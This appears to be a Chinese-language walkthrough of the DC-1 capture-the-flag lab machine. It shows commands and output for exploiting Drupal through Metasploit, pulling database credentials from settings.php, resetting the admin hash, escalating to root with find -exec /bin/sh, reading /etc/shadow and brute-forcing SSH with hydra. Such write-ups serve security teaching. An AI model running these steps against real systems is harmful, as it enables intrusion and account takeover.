DC-1

Wappalyzer、exploit-db.com、msf、python -c 'import pty;pty.spawn("/bin/bash")'

发现主机：

nmap -sP 192.168.88.0/24 

查看端口

nmap -p- 192.168.88.136  发现开启了80端口

使用Wappalyzer插件发现CMS为drupal

搜索kali自带的https://www.exploit-db.com/发现可进行漏洞检测：Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code (Metasploit)

使用msf攻击成功，得到flag1 ，为了完整的shell交互可使用以下命令

python -c 'import pty;pty.spawn("/bin/bash")'

flag1：Every good CMS needs a config file - and so do you.

配置文件的利用、修改密码

得到config的提示，百度得知drupal默认配置文件：/sites/default/settings.php

flag2：Brute force and dictionary attacks aren't the only ways to gain access (and you WILL need access). What can you do with these credentials?

看来从配置文件直接拿到了数据库账号密码

 'database' => 'drupaldb',
      'username' => 'dbuser',
      'password' => 'R0ck3t',
      'host' => 'localhost',
      'port' => '',
      'driver' => 'mysql',
      'prefix' => '',
’

登陆数据库发现后台的登录账号密码 其中密码是加密过的

admin | $S$DifAHlulp74nq/0qgqyEZC3myrg2.BKIhElw6/N/dRHCXN/aHTnu

思路是修改密码直接登录，用drupal自带的/var/www/scripts/password-hash.sh加密12345

www-data@DC-1:/var/www/scripts$ php password-hash.sh 12345 
php password-hash.sh 12345
​
password: 12345                 hash: $S$DYcuHU5yVhSkEP9Yuya/ODVNJkO4DpbPtvMKqUGM8Zps7DsgPhne

到数据库修改密码

update set pass="$S$DYcuHU5yVhSkEP9Yuya/ODVNJkO4DpbPtvMKqUGM8Zps7DsgPhne" where name="admin"

登录后台得到flag3：Special PERMS will help FIND the passwd - but you'll need to -exec that command to work out how to get what's in the shadow.

/etc/shadow文件利用、find提权

查看/etc/shadow（存放用户和用户口令）发现没有权限

www-data@DC-1:/$ cat /etc/shadow
cat /etc/shadow
cat: /etc/shadow: Permission denied

提权：find -name 文件名 -exec /bin/sh \；

www-data@DC-1:/var/www$ whoami
whoami
www-data
www-data@DC-1:/var/www$ find -name flag1.txt -exec /bin/sh \;
find -name flag1.txt -exec /bin/sh \;
# whoami
whoami
root

flag4:$6$Nk47pS8q$vTXHYXBFqOoZERNGFThbnZfi5LN0ucGZe05VMtMuIFyqYzY/eVbPNMZ7lpfRVc0BYrQ0brAhJoEzoEWCKxVW80:17946:0:99999:7:::

~、hydra+ssh服务

方法一 直接进root的家目录看flag4

# cd ~flag4
cd ~flag4
# ls
ls
flag4.txt
# cat flag4.txt
cat flag4.txt
Can you use this same method to find or access the flag in root?

Probably. But perhaps it's not that easy.  Or maybe it is?

方法二 hydra爆破flag4的口令 之前发现的开放了22端口

kali自带的字典文件 路径：/usr/share/wordlists/rockyou.txt.gz

hydra -l flag4 -P /usr/share/wordlists/rockyou.txt.gz ssh://192.168.88.136

Hydra v9.3 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2022-12-05 07:14:53
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking ssh://192.168.88.136:22/
[22][ssh] host: 192.168.88.136   login: flag4   password: orange
[STATUS] attack finished for 192.168.88.136 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2022-12-05 07:16:05
          

连接ssh服务

ssh [email protected]

The authenticity of host '192.168.88.136 (192.168.88.136)' can't be established.
ECDSA key fingerprint is SHA256:89B+YqcNl4cSf/BZk26MQG1QeW4BvBlVENMbTRhVhsU.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.88.136' (ECDSA) to the list of known hosts.
[email protected]'s password: 
Linux DC-1 3.2.0-6-486 #1 Debian 3.2.102-1 i686

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
flag4@DC-1:~$ ls
flag4.txt
flag4@DC-1:~$ cat flag4.txt
Can you use this same method to find or access the flag in root?

Probably. But perhaps it's not that easy.  Or maybe it is?

flag4@DC-1:/$ ls
bin   home            lib64       opt   sbin     tmp      vmlinuz.old
boot  initrd.img      lost+found  proc  selinux  usr
dev   initrd.img.old  media       root  srv      var
etc   lib             mnt         run   sys      vmlinuz
flag4@DC-1:/$ cd ./root
-bash: cd: ./root: Permission denied

需要提权到root得到最终的结果（find提权）

# ls
ls
thefinalflag.txt
# cat thefinalflag.txt
cat thefinalflag.txt
Well done!!!!

Hopefully you've enjoyed this and learned some new skills.

You can let me know what you thought of this little journey
by contacting me via Twitter - @DCAU7